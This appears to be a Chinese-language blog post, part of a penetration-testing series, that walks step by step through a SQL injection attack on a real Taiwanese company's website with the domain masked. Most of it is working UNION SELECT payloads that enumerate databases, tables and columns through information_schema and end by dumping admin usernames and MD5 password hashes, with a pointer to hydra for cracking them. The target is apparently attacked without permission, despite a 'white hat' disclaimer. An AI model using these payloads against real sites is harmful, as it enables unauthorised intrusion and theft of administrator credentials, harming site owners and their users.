Web滲/透/測試實戰(2)—獲取網站後臺登錄用戶名密碼

接上一篇內容:

滲/透/測/試實戰(1)—成功滲/透臺灣某淨化設備公司官網

目錄

寫在前面

聲明:只做測試,發現對方的漏洞,並不進行破壞性操作

信息彙總

漏洞彙總:

數據庫信息:

利用information_schema庫:

1、 數據庫分析

①獲取該用戶權限下,有多少個數據庫

②下一步獲取這兩個數據庫的名字

2、表結構分析

①獲取數據庫多少表

②獲取表名稱

3、用戶名密碼獲取

首先,我們要先拿到admin表的表結構,即包含的字段名

獲取4個字段的名稱

獲取登錄名/密碼



寫在前面

作爲一個防禦型白帽黑/客

你一定要知道黑/客的進攻套路

纔能有相應的防禦措施

聲明:只做測試,發現對方的漏洞,並不進行破壞性操作





信息彙總


漏洞彙總:


1、存在SQL注入漏洞2、SQL注入查詢長度爲9個字段,即 union select 1,2,3,4,5,6,7,8,93、網站無錯誤回顯,SQL執行錯誤顯示空白頁面


數據庫信息:

1、數據庫版本:mysql 5.7.312、當前數據庫:jiuyu_jiuyu3、當前登錄用戶:jiuyu@localhost4、注入點:  http://www.xxx.com.tw/page.php?id=133     union   select 1,2,version(),current_user(),5,6,7,8,9


利用information_schema庫:


在mysql數據庫中

當前登錄用戶下,會有一個information_schema數據庫

這個數據庫裏包含了當前用戶權限下

所有database、table、column、privilege等等的彙總信息

在注入過程中,可以充分利用。



然後我們根據當前獲得的信息,進行進一步的***


1、 數據庫分析


①獲取該用戶權限下,有多少個數據庫

#拼接注入連接http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables#通過information_schema數據庫獲取數據庫相關信息


通過注入SQL語句

得到了數據庫的數量 2 個



②下一步獲取這兩個數據庫的名字


#通過使用limit 可以逐條返回表數據http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tableslimit 2


通過添加兩個limit,限定兩條返回值

得到了僅有的兩個數據庫名稱

information_schema 和 jiuyu_jiuyu

information_schema是默認的信息彙總表

所有,有用的就是jiuyu_jiuyu這個庫




2、表結構分析

得到了目標數據庫:jiuyu_jiuyu

下面對該數據庫進行分析


①獲取數據庫多少表


http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'#返回值爲 4個表


②獲取表名稱


#只有4個表,使用limit 逐條獲取表名http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'limit 1

依次得到四個表


adminsmallclasswenzhangneirong


    


emmm 經過認真分析

不難發現

admin表會有一些重要信息

其他的wenzhang、neirong之類的應該是一些新聞信息

下面 我們就對admin表進行數據獲取


3、用戶名密碼獲取


首先,我們要先拿到admin表的表結構,即包含的字段名


#獲取admin表的字段數量http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin'#包含四個字段



獲取4個字段的名稱


#獲取admin表字段名稱http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin' limit 1




通過limit 逐條獲取admin表的字段值    id    username    password    quanxian



獲取登錄名/密碼

是不是有點緊張

用戶名密碼什麼的




#獲取admin表的數據值http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin



成功獲取用戶名密碼返回值。

當然,密碼是md5加密過的

如果想破解出明文

可以使用之前介紹過的密碼爆破工具hydra進行爆破


Kali***測試工具庫(三)hydra——密碼暴力破解工具


好了,點到爲止

只做安全測試

發現漏洞

不要做違法亂紀的事情哦。


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章